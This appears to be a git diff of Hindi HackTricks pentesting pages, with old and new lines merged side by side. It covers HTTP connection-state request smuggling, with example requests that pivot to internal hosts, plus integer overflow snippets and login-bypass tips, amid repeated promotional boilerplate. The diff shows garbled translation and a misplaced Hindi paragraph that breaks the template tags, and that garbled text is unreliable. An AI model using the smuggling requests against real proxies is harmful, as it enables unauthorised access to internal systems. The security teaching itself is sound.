<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप अपनी **company का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* अपनी hacking tricks साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
**[https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html) देखें** **जाँच करें [https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)**
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप अपनी **company का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* अपनी hacking tricks साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>

View file

@ -1,24 +1,24 @@
# HTTP Connection Request Smuggling # HTTP कनेक्शन रिक्वेस्ट स्मग्लिंग
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**। * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।**
</details> </details>
**यह पोस्ट [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks) का सारांश है** **यह पोस्ट का सारांश है [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
## Connection State Attacks <a href="#state" id="state"></a> ## कनेक्शन स्थिति हमले <a href="#state" id="state"></a>
### पहली-अनुरोध मान्यता ### पहली रिक्वेस्ट मान्यता
रिवर्स प्रॉक्सी रिक्वेस्ट को रूट करते समय, गलती से कुछ प्रॉक्सी में **होस्ट हेडर** पर निर्भर कर सकते हैं ताकि वे पिछले-एंड सर्वर का निर्धारण कर सकें, अक्सर उन्हें पहुंचने की अनुमति दी जाने वाली होस्ट की सफेद सूची पर निर्भर होता है। हालांकि, कुछ प्रॉक्सी में एक सुरक्षा गड़बड़ी होती है जहां सफेद सूची केवल कनेक्शन में पहले अनुरोध पर ही लागू होती है। इसके परिणामस्वरूप, हमलावर इसे इस तरह से शारू कर सकते हैं कि पहले किसी अनुमति प्राप्त होस्ट को अनुरोध करके और फिर उसी कनेक्शन के माध्यम से आंतरिक साइट का अनुरोध कर इसका शारू कर सकते हैं: रिवर्स प्रॉक्सी जब रिक्वेस्ट रूट करते हैं, तो डेस्टिनेशन बैक-एंड सर्वर निर्धारित करने के लिए **होस्ट हेडर** पर निर्भर कर सकते हैं, अक्सर उन्हें पहुंचने की अनुमति देने वाले होस्ट की सफेद सूची पर भरोसा करते हैं। हालांकि, कुछ प्रॉक्सी में एक सुरक्षा गड़बड़ी होती है जहाँ सफेद सूची केवल कनेक्शन में पहली रिक्वेस्ट पर लागू होती है। इसके परिणामस्वरूप, हमलावर इसे इस तरह से उत्पन्न कर सकते हैं कि पहले किसी अनुमत होस्ट पर एक रिक्वेस्ट भेजकर फिर उसी कनेक्शन के माध्यम से एक आंतरिक साइट का अनुरोध करें:
```text ```text
GET / HTTP/1.1 GET / HTTP/1.1
Host: [allowed-external-host] Host: [allowed-external-host]
@ -28,7 +28,7 @@ Host: [internal-host]
``` ```
### पहली अनुरोध मार्गनिर्धारण ### पहली अनुरोध मार्गनिर्धारण
कुछ कॉन्फ़िगरेशन में, एक फ्रंट-एंड सर्वर **पहले अनुरोध के होस्ट हेडर** का उपयोग कर सकता है ताकि उस अनुरोध के लिए पिछले-एंड कनेक्शन का मार्गनिर्धारण किया जा सके, और फिर सभी आगामी अनुरोधों को उसी पिछले-एंड कनेक्शन पर स्थायी रूप से मार्गिकृत कर सकता है। इसे इस प्रकार प्रदर्शित किया जा सकता है: कुछ कॉन्फ़िगरेशन में, एक फ्रंट-एंड सर्वर **पहले अनुरोध के होस्ट हेडर** का उपयोग कर सकता है ताकि उस अनुरोध के लिए पिछले-एंड को मार्गिकरण करें, और फिर सभी आगामी अनुरोधों को उसी पिछले-एंड कनेक्शन पर स्थायी रूप से मार्गित करें। इसे इस प्रकार प्रदर्शित किया जा सकता है:
```text ```text
GET / HTTP/1.1 GET / HTTP/1.1
Host: example.com Host: example.com
@ -36,8 +36,21 @@ Host: example.com
POST /pwreset HTTP/1.1 POST /pwreset HTTP/1.1
Host: psres.net Host: psres.net
``` ```
यह समस्या संभावित रूप से [होस्ट हेडर हमलों](https://portswigger.net/web-security/host-header) के साथ कंबाइन की जा सकती है, जैसे पासवर्ड रीसेट पॉइजनिंग या [वेब कैश पॉइजनिंग](https://portswigger.net/web-security/web-cache-poisoning), अन्य वंशाज या अतिसंदेहित पहुंच को उत्पन्न करने के लिए या अतिरिक्त वर्चुअल होस्ट्स तक अनधिकृत पहुंच प्राप्त करने के लिए। यह मुद्दा संभावित रूप से [होस्ट हेडर हमलों](https://portswigger.net/web-security/host-header) के साथ कंबाइन किया जा सकता है, जैसे पासवर्ड रीसेट पॉइजनिंग या [वेब कैश पॉइजनिंग](https://portswigger.net/web-security/web-cache-poisoning), अन्य भेदभावों का शोषण करने या अतिरिक्त वर्चुअल होस्ट्स तक अनधिकृत पहुंच प्राप्त करने के लिए।
{% hint style="info" %} {% hint style="info" %}
इन वंशाजों की पहचान के लिए, HTTP रिक्वेस्ट स्मग्लर में 'कनेक्शन-स्टेट प्रोब' फीचर का उपयोग किया जा सकता है। इन भेदभावों की पहचान के लिए, HTTP रिक्वेस्ट स्मग्लर में 'कनेक्शन-स्टेट प्रोब' विशेषता का उपयोग किया जा सकता है।
{% endhint %} {% endhint %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>

View file

@ -4,11 +4,11 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs के माध्यम से [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में सबमिट करें।** * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
@ -28,7 +28,9 @@ println!("{}", add_result);
``` ```
{% endtab %} {% endtab %}
{% tab title="C" %} {% tab title="C" %}इंटीजर ओवरफ्लो क्या है?
इंटीजर ओवरफ्लो एक सीरियस सिक्योरिटी वन्य है जिसमें एक प्रोग्राम या सिस्टम को एक इंटीजर डेटा परिमाण से अधिक डेटा प्राप्त होता है, जिससे अनुरूप व्यवहार या सिक्योरिटी समस्याएं उत्पन्न हो सकती हैं। यह एक कॉमन प्रोग्रामिंग गलती है जो कि हैकर्स को एक सिस्टम पर अधिक डेटा प्राप्त करने के लिए उपयोग कर सकते हैं। इंटीजर ओवरफ्लो को ठीक करने के लिए सुरक्षा पैचेस और डेटा स्वरूपण की तकनीकें हो सकती हैं। %}
```c ```c
#include <stdio.h> #include <stdio.h>
#include <limits.h> #include <limits.h>
@ -47,17 +49,14 @@ printf("%d\n", c);
return 0; return 0;
} }
``` ```
{% endtab %}
{% endtabs %}
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह, * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** पर **फॉलो** करें
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details> </details>

View file

@ -1,42 +1,63 @@
# लॉगिन बापास # लॉगिन बापास
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित** हो जाए? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की इच्छा रखते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**. * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** **करें**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें** * **हैकिंग ट्रिक्स साझा करें** द्वारा [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके
</details> </details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा इवेंट है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबलता हुआ मिलन स्थान है। [**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
## **नियमित लॉगिन बापास** ## **नियमित लॉगिन बापास**
यदि आपको लॉगिन पेज मिलता है, तो यहां आप कुछ तकनीकें ढूंढने के लिए प्रयास कर सकते हैं: यदि आप एक लॉगिन पृष्ठ पाते हैं, तो यहाँ आप कुछ तकनीक पाएंगे जिन्हें बायपास करने की कोशिश कर सकते हैं:
* पेज के अंदर **टिप्पणियों** की जांच करें (नीचे और दाएं जाएं?) * पृष्ठ के अंदर **टिप्पणियाँ** की जाँच करें (नीचे और दाएं जाएं?)
* जांचें कि क्या आप **प्रतिबंधित पेजों तक सीधे पहुंच सकते हैं** * देखें कि क्या आप **प्रतिबंधित पृष्ठों तक सीधे पहुंच सकते हैं**
* **पैरामीटर्स को न भेजें** (कोई भेजें नहीं या केवल 1) * **पैरामीटर न भेजें** (केवल 1 न भेजें या कोई भी न भेजें)
